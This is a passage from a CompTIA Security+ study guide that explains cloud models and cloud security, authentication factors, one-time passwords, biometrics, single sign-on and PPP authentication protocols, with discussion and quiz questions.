can install and manage operating systems, file systems, and whatever else is
needed, just like if they'd rented out a piece of a data center, since that's
essentially exactly what it is. The resources offered are typically, but not
necessarily, VMs, but either way the provider manages and is responsible for
the underlying hardware.

362 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Some sources have added other models to the list, such as Storage-as-a-service, Information-as-a-service,
Security-as-a-service, and so on. For the most part they're just refinements on the three categories: for
instance, popular cloud storage services are a little like IaaS, but are designed to seamlessly mirror local files
to back them up or to share them with other users and devices For any cloud service, the relevant point is that
it's nothing customers couldn't just do themselves locally if they wanted to: the cloud provider just offers
flexibility and ease of operation.
Likewise, there are four deployment models, which describe just who can access a given cloud service.

Public The service is available to the general public, whether as a paid service or even for free. It can
be owned and hosted by any sort of public or private organization. Cloud services offered
directly to consumers are usually this type.
Private The service is accessible only to a single organization, though it is shared among multiple
divisions or business units. It might be on-premises or off, and it might be owned and
managed by the organization itself, or a third party. This sort of cloud might be a natural
extension of increasing virtualization in a traditional server room.
Community The service is shared between a number of organizations which have common concerns and
needs, for example organizational mission or specific technical, policy, or security
requirements. It may be hosted by one, by a third party, or as a cooperative venture.
Hybrid The service has some combination of public, private, and community cloud characteristics
under a common hardware or software infrastructure. For example, one provider might host
public cloud services, but also host private clouds for large customers with higher security
needs or other specialized requirements; while both might be the same fundamental service
and even in the same facility there's some separation between the two. For another, the user of
a private cloud might provision cloud bursting features, allowing it to add public cloud
resources during peak usage times.

Just like the service models, people since have used other deployment models to describe cloud offerings.
Some have even suggested movement toward an Intercloud which will result from the eventual global
connection of interoperable clouds. Since it's a quickly evolving field, only time will tell which definitions
will stick.

Cloud concerns
Cloud computing sometimes gets discussed as some sort of magic that's sure to replace everything. And that's
not entirely untrue: it's been so transformative because its flexibility and economies of scale mean that it can
replace services many organizations used to offer in-house at a fraction of the overall cost, and its online
nature makes it a great fit for widely distributed users. At the same time, skeptics will point out shortcomings
and risks found in cloud technologies.
One problem is the need for bandwidth: with the exception of in-house private clouds, cloud computing
generally requires a lot of WAN traffic, and a service outage will block access to cloud resources entirely.
This often isn't a problem now that fast and inexpensive Internet connections are so common, but
organizations without sufficient speed and reliability might find cloud performance unsatisfactory.
Cloud services can also have a "lock-in effect." A cloud service might be easy to join or expand usage of, but
the same can't always be said about leaving one. Depending on the technology, it might be difficult to
transition from one provider to another, or to return to an in-house solution when needs change.

CompTIA Security+ Exam SY0-501 363


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Cloud security
Cloud services have multiple potential security problems, some of which are unique, and others of which are
shared with traditional network services.

Exam Objective: CompTIA SY0-501 2.6.2.10, 3.7.8, 3.7.9

 Any cloud service is still a network service, and subject to network attacks. This is no different from
traditional network services, but it creates risks that don't exist in the same way on traditional desktop
applications.
 Using an off-premises cloud service requires secure communications to and from the cloud.
 Apart from the need for secured communications with outside providers, using a cloud service for
sensitive information means giving a lot of control of its handling over to another entity. It's possible
that the provider doesn't give the attention to data security that your own organization would, especially
if your data is subject to special regulatory requirements.
 Attacks on public cloud services can affect several or even all customers at a time, so your data might
be compromised by an attack on another customer, or even by an attack another customer's poor
security practice allowed to happen.
 Different cloud services have varying privacy policies on how they might share customer data and
information, and exactly what jurisdictional privacy laws apply.

One way to help secure cloud access is with a Cloud Access Security Broker (CASB) placed between the
service consumer and the service provider. CASBs are control points, that allow an enterprise to centrally
apply its security policies to all cloud access from the enterprise network. For example, you can use one to
manage authentication, encryption, logging, and monitoring services. The CASB can be cloud-based itself, or
located on premises, such as on a proxy server.
On the other hand, cloud services can be a security solution in themselves. While it doesn't map neatly to
NIST's three models, Security as a Service is a growing field of IT security delivered as a cloud service. One
example is cloud-based antimalware or IDS, which have the benefit of using the cloud for distributing
definitions files and noticing wider patterns. Other security services involve authentication, logging, or event
management services outsourced to a cloud-based provider.

Legal implications of the cloud


The nature of cloud services and storage means that sensitive data might be shared or moved between
different datacenters or even facilities in different countries. Even if you trust them all for security, this can
have serious legal implications, especially when it comes to regulatory compliance. The simpler matter is that
even within your own country there may be specific regulatory or contractual issues related to storing
sensitive data in a third-party or shared cloud service, so you need to research what rules apply to you. More
complicated issues arise when data might be stored in a different country than your business or your
customers.

Exam Objective: CompTIA SY0-501 5.6.4.4, 5.6.4.5


Data sovereignty, or data residency, is the legal concept that binary data is subject to the laws of whatever
nation it is stored in. That might be one of those issues that seems really self-evident at first, but them imagine
it in the context of multi-national corporations building datacenters around the world for cloud services. What
if your customers' personal information ends up in a country with weak privacy laws, or where government
agencies routinely engage in surveillance or searching of private data with little due process? What if the
country where you're storing data has stricter requirements for privacy or auditing than your own? What if
you store data considered important to national security?
Laws and guidelines for data residency are evolving to catch up with emerging technologies, but it's your
responsibility to be aware of them. It may be illegal to store some data in other nations, and data you store on
foreign soil may be subject to your own nation's laws as well as those of where it is physically located. The

364 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Module B: Virtual and cloud systems

reverse is often true: if you store data in a foreign-owned datacenter in your own country, it might be subject
to some laws of the host's home country. Even if laws aren't a barrier for your chosen data storage solution,
it's important to disclose to customers where their personal data might be stored.

Discussion: Cloud services


1. What cloud services have you used? What models did they use?
Answers may vary.
2. You're consulting for a company that's moving into a new facility and trying to decide whether to use a
cloud provider instead of an in-house server room. How would you determine what cloud model they
should evaluate?
Look into what services they would need to provide themselves. If they just need common services like
storage and email, SaaS providers might fill the role, for example, but if they really want full control
they'll want an IaaS provider. It's possible some mix of multiple models might best suit their needs.
3. What special security concerns should that same company address when considering a cloud service?
They should consider the cloud provider's security controls, their privacy policy, relevant regulatory
requirements, and how communications with the provider will themselves be secured.

CompTIA Security+ Exam SY0-501 365


Chapter 7: Securing network services / Module B: Virtual and cloud systems

Assessment: Virtual and cloud systems


1. What model would describe a cloud accounting service? Choose the best response.
 IaaS
 PaaS
 SaaS
 SDN

2. All else being equal, bare metal hypervisors are more efficient than hosted ones. True or false?
 True
 False

3. As long as the host machine has antimalware protection, VMs are protected as well. True or false?
 True
 False

4. What cloud model is likely to provide access to a software environment you can use to develop and host
web-based applications, but not the applications themselves? Choose the best response.
 IaaS
 PaaS
 SaaS
 Any of the above

5. When you use a cloud service, the security controls used by fellow customers could endanger your own
security. True or false?
 True
 False

6. What kind of virtualization relies on a "master image?" Choose the best response.
 Bare metal
 Container
 Non-persistent VDI
 Persistent VDI

7. Your organization has decided to outsource a number of IT services to a cloud provider. They're hosted
outside your enterprise network, but you want to centrally manage all authentication, encryption, activity
logging, and other security policies for connections between local computers and the cloud. What security
solution would address these issues?
 On-premise policies
 Private deployment
 Security as a Service
 Security broker

366 CompTIA Security+ Exam SY0-501


Chapter 7: Securing network services / Summary: Securing network services

Summary: Securing network services


You should now know:
 How to secure web applications
 About virtual and cloud systems, along with their specific security concerns

CompTIA Security+ Exam SY0-501 367


Chapter 8: Authentication
You will learn:
 About authentication factors and principles
 About authentication systems

CompTIA Security+ Exam SY0-501 369


Chapter 8: Authentication / Module A: Authentication factors

Module A: Authentication factors


If there's a single central principle to information security, it's access control: only letting the right people
view or alter sensitive data. In turn, if there's one principle that makes access control possible, it's
authentication: verifying that someone who claims to be "the right people" is actually telling the truth.
You will learn:
 About the AAA process
 About authentication factors and credentials
 About single sign-on

The AAA process


As great as encryption is for making sure your communications aren't intercepted in transit, it alone can't
make sure you're talking to the right person in the first place. This can be hard enough in person, and as they
say on the internet no one knows if you're a dog. Then if someone does slip past you, you need to minimize
the potential damage. This is why secure communications setup requires a strict three-step process, which
some protocols call AAA. The same process is valuable for local logon systems, or really any other situation
where access is secured. The process begins when a person, system, or any other entity wants to initiate
communications or access resources. This entity is commonly called either a security principal, or simply a
user.

Exam Objective: CompTIA SY0-501 4.1.1

Authentication Verified identification of a principal, for example via a user name/password or an ID card.
Note: Identification in itself is only the claim of identity made by the
principal, such as the user name alone. It's important too, but it doesn't
prove anything without the accompanying authentication.
Authorization Specifying the exact resources a given authenticated user is allowed to access.
Accounting Tracking the actions of an authenticated user for later review.

For a real world example of the AAA process, imagine you're guarding a security checkpoint to a restricted
wing. Someone comes up and says "I'm Jim from sales" (identification), so you check his ID badge to make
sure it's real (authentication), and now you know for sure it's him. Then you look on the access list to make
sure he's allowed in that wing (authorization), and finally have him sign the entry log (accounting.) In this
case, you can also see his identification on the badge itself: that's why identification is sometimes folded into
authentication.
Of the three, accounting is the least critical for secure systems, but it's still important when responding to
security incidents, or just to track resource uses for performance or other business purposes. Authorization is
vital especially against insider attacks or stolen credentials, but it's conceptually pretty straightforward; as
long as any access is associated with a specific user, that user can be assigned specific permissions. The most
complex part on a network is authenticating the user in the first place. It's also the part usually most visible to
the user. Consequently, while access control systems will use authorization and accounting, authentication
itself takes the most explanation.
It's easy to think of authentication in a strictly client-server fashion, where the server hosting resources asks
for credentials and the client provides them, but mutual authentication where each party verifies the other is
also common. Even in a strict-client server model imagine online banking: to you as a user it's important to
know it really is your bank's website, and that you're not being targeted by a phishing or MitM attack. It's true

370 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module A: Authentication factors

of authorization and accounting as well: if a network service can access files or services on your computer,
you might want to restrict or track exactly what it does.

Factor types
The simplest type of authentication is single-factor authentication. It requires a single element that proves
identity. That element of proof belongs to one category, or factor. Traditionally, there are three authentication
factors used in security.

Exam Objective: CompTIA SY0-501 4.1.2

Knowledge Something you know, like a password, PIN, or answer to a challenge question.
Possession Something you possess, like a physical key, ID badge, or smart card. Traditionally, this
includes any form of digital data a human can't be expected to memorize.
Inherence Something you are; that is, a unique physical or behavioral characteristic, like a fingerprint,
voice print, or signature. Inherence elements that are based on personal physical
characteristics are called biometrics.

While these three are central to most authentication discussion, changing technology has added other factors
to the list. Newer sources might include:

Something you do Behavioral recognition, such as analyzing the pattern of someone's keystrokes to
recognize a typing pattern. This category would also encompass signatures, which
traditionally are an inherence factor.
Somewhere you are Recognizing a network user's physical location. For example, a website might only
allow visitors whose IP addresses were initially assigned to a certain country, or a
mobile app might use a device's GPS function to give access based on where the user
is.

Authentication elements aren't always exactly the type factor you'd think at first glance. Most obviously a slip
of paper with a password written on it isn't a possession factor, since you're presumably expected to remember
the password and dispose of the paper—the actual authentication system just wants you to type in the
information. For other counterintuitive examples:
 Leaning into a facial recognition scanner is inherence—your face is a part of your identity. An ID card
with your photo is still just possession, though a guard could use the photo itself to help verify that the
card isn't stolen.
 A single-use PIN texted to your phone number every time you log in isn't a knowledge element, even if
it superficially looks like one. It's a possession test, proving that you're the person holding your phone.

On the network especially, authentication is an ongoing process. Session hijacking attacks mean it's important
to verify that each packet is part of the same ongoing conversation. To some extent sufficiently strong
encryption set up during initial authentication handles this, but some systems and protocols will require re-
authentication periodically, or take other measures to make sure that the same user is still there. Usually that's
in a way not visible to the user, but there are exceptions. One example is an ATM requiring users to re-enter
their PIN after each transaction; another is a website that automatically logs users off after ten minutes of
inactivity.

CompTIA Security+ Exam SY0-501 371


Chapter 8: Authentication / Module A: Authentication factors

Multifactor authentication
Single-factor authentication is simple and easy, which is why it's so widely used. The problem is that
authentication factors are imperfect. Knowledge factors like passwords are easily shared or even guessed.
Possession factors can be stolen or duplicated. Even inherence factors can be falsified: a fingerprint scanner
can potentially be fooled by using an existing fingerprint smudge and a little glue.
Research has shown that multifactor authentication with two or three factors is much stronger. For example,
an ATM card and its PIN are much more secure than either would be apart— both learning the PIN and
acquiring the card is a lot harder than either would be separately. This is easy in face-to-face situations, but it's
harder in computing where all factors eventually have to be expressed as digital data and often shared
remotely. The ATM has a specialized reader to recognize your card, but when you log into your bank's
website, your computer probably doesn't. This is why network authentication traditionally uses single-factor
authentication using passwords or other knowledge, but increasingly that's not enough and designers had to
get more creative.
Two-factor authentication is popular for modern high security applications. Sometimes inherent factors like
fingerprint scanners or other biometrics are used, but more commonly is some sort of possession. If you've
ever logged onto an online service, and it asked for confirmation through a separate PIN sent to your
telephone number or email address. Some systems might even require three-factor authentication.

One important point to clarify is that just requiring multiple elements doesn't make an authentication process
multifactor. The elements also need to represent different factor types. For instance, you've probably had a
website ask you both for your password and the answer to a security question, or had to enter both your credit
card number and the "secret code" printed on the back. Even a physical door might need two separate keys,
one for the lock on the knob and one for the deadbolt. All three of these examples have security benefits, since
someone that's stolen one element doesn't necessarily have the other. At the same time, they're not true two-
factor authentication, nor are they as strong: it's easier for someone to falsify identity twice the same way than
to do it two different ways.
Actual examples of two-factor authentication include:
 ATM card and PIN
 Physical token and password
 Password and fingerprint scan
 Physical key and alarm passcode

372 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module A: Authentication factors

Discussion: Authentication basics


1. How are all three elements of the AAA process important to security?
Authentication controls who has access, authorization controls what resources an authenticated user can
use, and accounting allows user activities and system changes to be logged.
2. Apart from passwords, what authentication factors are in use at your organization?
ID badges, digital certificates, and signatures are common, among many others.
3. What multifactor authentication systems have you used in the past? Feel free to include those not related
to networks.
Answers may vary, but most people have used a payment card along with a signature or PIN.

Digital credentials
A lot of credential types are probably familiar to you, and don't need much explanation. Keys, ID cards, and
passwords are doubtless part of your daily life. Even if you've never seen a fingerprint or retina scanner
outside of a spy movie, the real world devices follow the same principles. Some others need a little more
explanation.

Exam Objective: CompTIA SY0-501 4.2.12, 4.3.2, 4.3.4.1, 4.3.4.2, 4.3.5.1


The first thing to keep in mind is that when you authenticate to a computer or other electronic, any
authentication factor needs to be digitized somehow. Even if it's reading biometric information like a
fingerprint, your fingerprint pattern is going to be turned into a digital map that can be compared against the
one stored on a device. This means that within the system, all authentication factors are data, or knowledge
which can be stolen or duplicated. In well-secured systems, records stored on devices and especially
transmitted over the network themselves need to be secured. They might be encrypted, or even turned into
cryptographic hashes which can verify, but not recreate the original information.
For similar reasons, it's easiest to enter credentials into a system when they're digital data in the first place:
what would you do if your apartment complex's website asked you to use your door key to log in? More
realistically, consider modern ID card with lots of written information, a photograph, a hologram, and other
things that help a security guard spot fakes. Making a card scanner that sees it exactly how the guard does is
much different, so it stores digital credentials in a different way.
Especially when it comes to possession factors, there are several elements, or implementations, of digital
authentication that you should be familiar with.

Digital certificate A file created and signed using special cryptographic algorithms. The holder has
both a public certificate which can be shared freely, and a secret encryption key
which is never shared. Sample data encrypted with the secret key can be decrypted
with the public certificate, proving the person or system presenting the certificate
also holds the key. The authentication system can store certificates for allowed
users, or submit a newly presented certificate to a trusted third party such as a
certificate authority to verify its owner's identity.
One-time password A single-use PIN or password that is valid for a single session, so can't be stolen
(OTP) and reused. The OTP still has to be known to both the user and the authenticator
somehow, so it's a challenge to accurately create one. An OTP can be generated
independently on both ends by a sequential or time-based algorithm, or it can be
generated by the authenticator and transmitted to the user out-of-band, such as to
an email address or phone number.

CompTIA Security+ Exam SY0-501 373


Chapter 8: Authentication / Module A: Authentication factors

Hardware token Broadly speaking, any physical device used to aid authentication by containing
secret information. A hardware token might have an LCD display to generate
OTPs you can type in, or it might be a digital certificate securely stored on a USB
key or scannable card. With the right programming, a smartphone or other mobile
device can be a security token.

Software token A stored file that serves similar purposes to a hardware token. The term is a little
flexible: usually it's applied to applications that allow a smartphone or other
computer to serve as a hardware token, but it's sometimes used to describe
temporary authentication and authorization data stored on and exchanged between
computers in single sign-on environments.
Magnetic stripe card A traditional machine-readable card, such as a bank or transit card, with a
magnetic stripe to store user data. They've been around a very long time, and
while they're useful they're not secure. They don't store very much data, and
they're easy to clone. Magnetic stripe cards can still be used in multi-factor
authentication, but they're not a very strong method on their own.

374 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module A: Authentication factors

Smart card A newer authentication cards with integrated circuits built in. At the least, a smart
card's chip holds basic identifying information like a magnetic stripe would; it can
also hold digital certificates, store temporary data, or even perform cryptographic
processing functions to keep its data secure. Smart cards don't generally contain
batteries, but instead receive power from the reader.

 Contact smart cards make physical contact with the card reader to receive
power and transmit information.
 Contactless smart cards are powered by radio frequency induction from the
reader, and communicate with it using NFC over a 1-3" (2-10cm) distance.
 Proximity cards work like contactless cards, but operate on different
frequencies and hold less information. They operate at distances up to 15"
(50cm) and are usually only used to unlock doors.

Common access card The smart card standard used by active duty US military and Department of
(CAC) Defense personnel both for personal identification and to access secure systems
and locations. As well as human-readable identification, barcodes, and a magnetic
stripe for local security systems, it has a chip with strong cryptographic functions.
In addition to storing one or more digital certificates, the CAC allows secure
verification of the bearer's PIN, providing two-factor authentication. Early CACs
required contact, but modern cards can use contactless authentication.
Personal identification A smart card standard used by other Federal agencies in the US. PIV is similar to
verification card (PIV) CAC, but not directly compatible. Different agencies can use somewhat different
card layouts and information, and their digital certificates are issued by different
certification authorities than the DoD's. PIV-Interoperable (PIV-I) cards adhere to
the PIV standard, but are available to non-federal organizations, both public and
private.

CompTIA Security+ Exam SY0-501 375


Chapter 8: Authentication / Module A: Authentication factors

Subscriber identity A contact-based smart card that stores the international mobile subscriber identity
module (SIM) (IMSI) number and key associated with a mobile network user. Most cellular
phones worldwide have a SIM slot built in to identify the user on the network,
though some networks store the IMSI in the phone hardware itself. Some SIM
cards store other user data, such as contacts.
SIM cards are available in multiple sizes.

One-time password generation


One-time passwords are one of the best ways to not worry whether your password is viewed or replayed,
since once it's been used it's not valuable to an attacker. That said, OTP isn't usually used as a single
authentication factor, but generally as part of a two-factor system. In theory, OTP authentication could be a
knowledge factor: you memorize a whole list of them, set them on the server, and use a new one every time
you log in. In practice, that's not very convenient, so generally OTP is a possession factor: a hardware or
software token generates the OTP itself.

Exam Objective: CompTIA SY0-501 4.3.4.3


Likewise, a token could just store a list of passwords matching one on the server, but an easier way is to
cryptographically combine a single shared secret that's never transmitted, with a moving factor that changes
with every new OTP. From the outside, that looks like a totally new, totally random password every time. The
trick is making sure the user's token and the authenticator stay synchronized. There are two main standards for
this.

376 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module A: Authentication factors

HMAC-based One-Time The moving factor is a counter. Whenever a new OTP is integrated, the token
Password (HOTP) generates a cryptographic hash-based message authentication code from the
stored password and the counter, then it increments the counter. The HMAC is
used as the OTP. The token and authenticator just need to be synchronized on
what the counter currently is.
Time-based One-Time Based on HOTP, and still uses an HMAC generated from a shared secret and
Password (TOTP) moving factor but the moving factor is a timestamp taken when the OTP is
generated. Since TOTP increments automatically rather than just when passwords
are generated, it's generally considered more secure, but for it to work at all the
token and authenticator must keep a fairly accurate time synchronization with
each other (usually about 30 seconds). TOTP is also subject to attacks that can
alter the authenticator's system clock, for example through poorly secured NTP
implementation. An attacker who can control the system clock can easily crack the
rest of the token by brute force, or just render legitimate tokens useless for DoS
purposes.

Biometric factors
When it comes to inherence factors, the most common example is biometric factors, or basically any physical
property unique to an individual human's body. Biometrics can be anything from fingerprints to DNA analysis
to scent, and they're usually distinguished from behavioral characteristics which can also be used for
identification, such as signatures or typing rhythm. Some of the most common biometric authentication
sensors include the following:

Exam Objective: CompTIA SY0-501 2.3.14, 4.3.3

Fingerprint scanner Measures the unique patterns of a human fingerprint. Larger palm scanners might
measure the whole hand.
Retinal scanner Measures the unique patterns of blood vessels on the inside of the eye, by shining
low-energy infrared light into the pupil.
Iris scanner Measures the fine patterns of the iris of the eye, usually with near-infrared light so
that patterns show clearly even in dark brown eyes. Sometimes incorrectly called
"retinal scanners", iris scanners are more popular because they're less intrusive and
easier to implement.
Facial recognition Compares an image of the entire face against a known photo. Facial recognition can
work with any device that has an ordinary digital camera, but its reliability depends
on the software used.
Voice recognition Measures the characteristics of a human voice against a recorded example, using a
combination of biometric and behavioral characteristics. Can work in theory on any
device with a microphone.

Many people aren't very clear about what can go wrong with biometrics, given a century of mystery and sci-fi
stories associating fingerprints, retina scans, and other such measurements with foolproof identification. The
first is that scanners can indeed be fooled. Fingerprint scanners have been bypassed by means as simple as a

CompTIA Security+ Exam SY0-501 377


Chapter 8: Authentication / Module A: Authentication factors

strip of tape that had been pressed to a real fingerprint, and facial or iris scanners by photographs of an
authenticated user.
The second is that any biometric scanner is actually using an imprecise digitization of a rather vague set of
physical measurements, so how well it works depends on just how sensitive the scanner is. Imagine a facial
recognition device. It needs to compensate for the imprecision of angle, distance, expression, makeup, and
slight changes in human appearance from day to day. If its tolerances are too tight it will be prone to a high
false rejection rate, impairing legitimate users. If they are too loose, it will be prone to a high false
acceptance rate, easily fooled by similar faces or printed photographs.
For any device, you can map false rejection rates and false acceptance rates on two opposing curves based on
device sensitivity. The place where they meet is called the crossover error rate (CER) or equal error rate
(EER). Whether that's where you want to set the device sensitivity depends on your precise security needs, but
in general you can measure the effectiveness of a biometric authentication method by how low its CER is.

Single sign-on
Traditionally, any network service requiring authentication would handle its own user authentication, but this
has problems as networks become more interrelated, as users have more and more accounts to keep track of,
and as security management becomes more complex and exacting. This has led to the popularity of single
sign-on (SSO) systems, which allow one set of user credentials to give access to a large number of services.
This can work two primary ways.

Exam Objective: CompTIA SY0-501 4.1.4

 In the strictest sense, SSO allows a user to sign in once to one of a group of mutually-trusting services,
then seamlessly switch between services without being prompted for credentials again. For example,
once you log into Gmail, you can freely switch to other Google services like YouTube or Google+, and
you'll only be prompted for your password again if you try to access something like account or
payment information. Behind the scenes, this all works by the servers communicating through tokens
and certificates to make sure it's still you without interrupting you.

378 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module A: Authentication factors

 SSO can also be used to describe systems where multiple independent services share authentication
servers. For example, Facebook Connect allows third-party websites to offer a "Log In with Facebook"
option. You still have to log into each site, but you can just use your Facebook credentials rather than
creating a new account for each site. More accurately, this approach is called same sign-on.

Related to SSO is single sign-off. It's just what it sounds like: signing off one service also signs off of all
related ones.

Transitive trust and federations


Fundamentally, authentication establishes a trust relationship between two parties. SSO requires that trust
relationship to be extended to three or more parties. One way to do this is transitive trust, where if one party
has explicit trust relationships with two other parties, that can form an implied trust relationship between
those two. For example, if Bob trusts (authenticated) Alice, and Charlie trusts Bob, Alice doesn't need to
present authentication to Charlie: Bob can vouch for her. The reverse isn't necessarily true: Alice only trusts
Charlie if both explicit relationships used mutual authentication.

Exam Objective: CompTIA SY0-501 4.1.3, 4.1.5


One common application of SSO is in Windows domains. On the individual domain level, authenticating with
the domain server also authenticates you for all resources that server controls. But larger networks form
hierarchical domain trees and forests, formed by explicit mutual trust relationships between the servers in the
forest. Due to transitive trust, you only have to sign on to your own domain: your domain server's trust in you
is good throughout the forest.

More broadly, federated identity management allows authentication systems to be shared across multiple
systems or networks that share authentication standards even if they're not directly associated with each other.
Members of a federation can share authentication tokens, access shared authentication servers, or otherwise
behave as though they're part of a unified security system. Federations and SSO aren't exactly the same, but a
federation makes single or same sign-on functions much easier to implement.
Remember that authorization is different from authentication: just because a server recognizes who you are
doesn't mean it gives you any special system permissions. Some SSO environments also exchange
authorization information between services, while in others each service independently controls its own
authorization systems.

CompTIA Security+ Exam SY0-501 379


Chapter 8: Authentication / Module A: Authentication factors

Discussion: Authentication factors


1. What online services have you used with single sign-on?
Answers may vary.
2. What's the difference between HOTP and TOTP?
HOTP advances the password in a predictable manner using a HMAC whenever a new one is generated,
while TOTP increments automatically using time stamps. TOTP is more secure, but requires time
synchronization on both sides.
3. A coworker set up his computer to use a fingerprint scanner for authentication, and for extra security he
set its options to require the closest possible match. Is this a good idea, and why?
Since biometric scans are hard to absolutely reproduce, very tight tolerances mean he's likely to be
rejected whenever he doesn't scan his finger just right. While this makes it less likely for anyone else to
bypass it, it might make his computer less usable for him too.

Assessment: Authentication factors


1. What AAA element specifies the exact resources a given principal is allowed to access? Choose the best
response.
 Accounting
 Authentication
 Authorization
 Identification

2. You require your users to log on using a user name, password, and rolling 6-digit code sent to a key fob
device. They are then allowed computer, network, and email access. What type of authentication have you
implemented? Choose all that apply.
 Basic single-factor authentication
 Federated identity management
 Multi-factor authentication
 Principle of least privilege
 Single sign-on

3. What are good examples of two-factor authentication? Choose all that apply.
 A credit card and a photo ID
 A credit card and a security code
 A credit card and a signature
 A password followed by a security question
 A password followed by a PIN texted to your phone

380 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module A: Authentication factors

4. What authentication standard is used by active duty US military personnel?


 CAC
 PIV
 OTP
 SIM

5. A secure records room installed a new iris scanner, chosen for its low crossover error rate. What does that
mean it has? Choose the best response.
 A high false acceptance rate and a high false rejection rate
 A high false acceptance rate and a low false rejection rate
 A low false acceptance rate and a high false rejection rate
 A low false acceptance rate and a low false rejection rate

6. Federated identity management allows authentication systems to be shared across multiple directly
associated systems or networks. True or false?
 True
 False

7. You've been instructed to implement two-factor authentication for a secure system. What of the following
would qualify? Choose all that apply.
 Password and OTP
 Smart card and OTP
 Smart card and fingerprint scan
 Iris scan and fingerprint scan
 Password and iris scan

CompTIA Security+ Exam SY0-501 381


Chapter 8: Authentication / Module B: Authentication protocols

Module B: Authentication protocols


On a local operating system, application, or other self-contained system, authentication is pretty
straightforward: it's handled within the system and you just need to make sure it's configured securely.
Authentication over a network is more difficult. Not only do all systems have to communicate using common
protocols, but for real security the credentials being exchanged must be kept secret, and for sustained
communication sessions authentication needs to be maintained over time.
You will learn:
 About PPP authentication systems
 About network authentication systems and protocols

Network authentication systems


Network authentication is generally simplest when you look at older network services and remote
authentication processes. Not just because it's often a matter of directly typing your user name and password
directly into a terminal window, but also since the credentials are just exchanged unencrypted like any other
data. This is insecure, and extremely vulnerable to eavesdropping, replay attacks, and session hijacking.
Newer replacements use cryptographic processes to make sure communications are set up securely: secrets
are never exchanged over unencrypted channels, and ideally even encrypted credentials are never transmitted
the same way twice, to prevent replay attacks.
Authentication, and more broadly AAA, isn't just for specific services; it's often used more centrally to secure
a network's resources, or restrict access to it in the first place. Often this is done using an authentication
server handling security functions for the rest of the network. There are a few different scenarios when a
network will use centralized authentication. All of them have some the same security concerns as remote
login protocols, and have seen much of the same evolution over time, but they also have some unique
properties and needs.
 To authenticate remote connections into the network
 To allow multiple nodes to communicate securely across an unsecured network
 To authenticate local users joining a LAN or WLAN

Point-to-Point Protocol
A leased line or switched circuit on the WAN, once established, is a pretty simple "pipe" for data without the
complications of a packet-switched network, but you still need some sort of data link layer protocol to do the
rest of the work of transporting higher level traffic. A common option is Point-to-Point Protocol (PPP), which
is used on everything from dialup connections to SONET leased lines, and can carry IP, IPX, and other high-
level traffic. PPP is also commonly used to carry data through the virtual circuit of a VPN, where it operates
on top of a tunneling protocol like PPTP or L2TP.

382 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

PPP itself consists of multiple layers and components. At the heart of it is the PPP encapsulation component,
which transmits data and handles error correction. Above it is Link Control Protocol (LCP), which negotiates
and terminates connections. It allows authentication, data compression, MTU negotiation, and detection of
loops and other errors. It also allows multiple links to be aggregated into a single logical connection, a feature
known as multilink PPP.
Also above is another network control protocol (NCP) for each L3 protocol PPP is expected to carry, for
example Internet Protocol Control Protocol (IPCP) for IP traffic. Multiple NCPs can run on one link.
Over serial connections PPP includes its own framing protocols; for example, on optical backbones it uses
Packet over SONET/SDH (POS). It can also be run over other L2 protocols like Ethernet or ATM. This allows
the authentication, compression, and connection-oriented nature of PPP to operate over a packet-switched
network. These standards, such as PPP over Ethernet (PPPoE) and PPP over ATM (PPPoA) are popular
especially for use with DSL modems and other residential gateway devices.

CompTIA Security+ Exam SY0-501 383


Chapter 8: Authentication / Module B: Authentication protocols

PPP authentication
PPP connections present an obvious need for network authentication, especially when they're not over a
permanent circuit. There are a number of standards commonly supported.

Exam Objective: CompTIA SY0-501 4.2.4, 4.2.5, 4.2.6, 6.3.2.1, 6.3.2.2, 6.3.2.3, 6.3.2.4, 6.3.2.5

PAP Password Authentication Protocol is the oldest and most widely supported standard. It uses a
two-way handshake: the client presents a username and password, then the server accepts or
rejects it. PAP gives only one-way authentication, and the exchange happens in plaintext; for this
reason, it should only be used as a last resort.
CHAP Challenge-handshake Authentication Protocol uses a three-way handshake, with security
provided by a shared secret: both clients know the secret in plaintext, but it's never transmitted
over the network.

1. The server sends a unique challenge message to the client.


2. The client responds with a hash created from the challenge and secret.
3. The server verifies the response against its own hash, and confirms or rejects the
authentication.
4. Periodically during the session, the server repeats the challenge process to prevent session
hijacking.
CHAP is more secure than PAP, but still has some vulnerabilities, and doesn't provide mutual
authentication or other advanced features.

MS-CHAP Microsoft's version of CHAP has some enhancements over the basic version: the password
doesn't need to be stored in plaintext, and it can perform mutual authentication. There are two
versions: MS-CHAPv1 and v2. Only v2 is supported by modern Windows versions, but even it
has weaknesses that make it highly susceptible to brute force attacks.
EAP Extensible Authentication Protocol is a PPP extension that can also be used for wireless
authentication. It's not an authentication method in itself, but rather a message format and set of
common functions that can be used to support a wide variety of specific authentication methods.
Some methods are password-based, and are more secure or flexible alternatives to CHAP, while
others use different security mechanisms.
 EAP-TLS and EAP-TTLS typically use X.509 certificates in the authentication process.
 EAP-SIM, used by GSM cellular networks, authenticates using device SIM cards.
 WPA Enterprise uses EAP along with the 802.1X standard for authentication.
 LEAP, or Lightweight EAP is a proprietary Cisco version of EAP, based on MS-CHAP. It
was widely used in early Wi-Fi devices but has been largely replaced with more secure
standards.
 EAP-FAST or EAP Flexible Authentication via Secure Tunneling is a newer Cisco
replacement for LEAP. It has stronger security, while keeping the "lightweight" aspect.
 PEAP, or Protected EAP is isn't an EAP authentication method, but rather a protocol that
secures EAP authentication in a TLS tunnel.

384 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

RADIUS
Remote Authentication Dial-In User Service (RADIUS) was initially designed to provide full AAA support for
dial-in users to networks. Since then it's been expanded to use for other PPP connections, or for joining
wireless networks. RADIUS can be used by ISPs to authenticate internet users; it can also be used to join
remote users to internal enterprise networks with services not accessible over the Internet.

Exam Objective: CompTIA SY0-501 4.2.7, 6.3.2.7


RADIUS is a client-server protocol, but probably doesn't work in the way you think. The RADIUS server
itself is on the internal LAN, and provides all the AAA functions. It can actually host a data file with all user
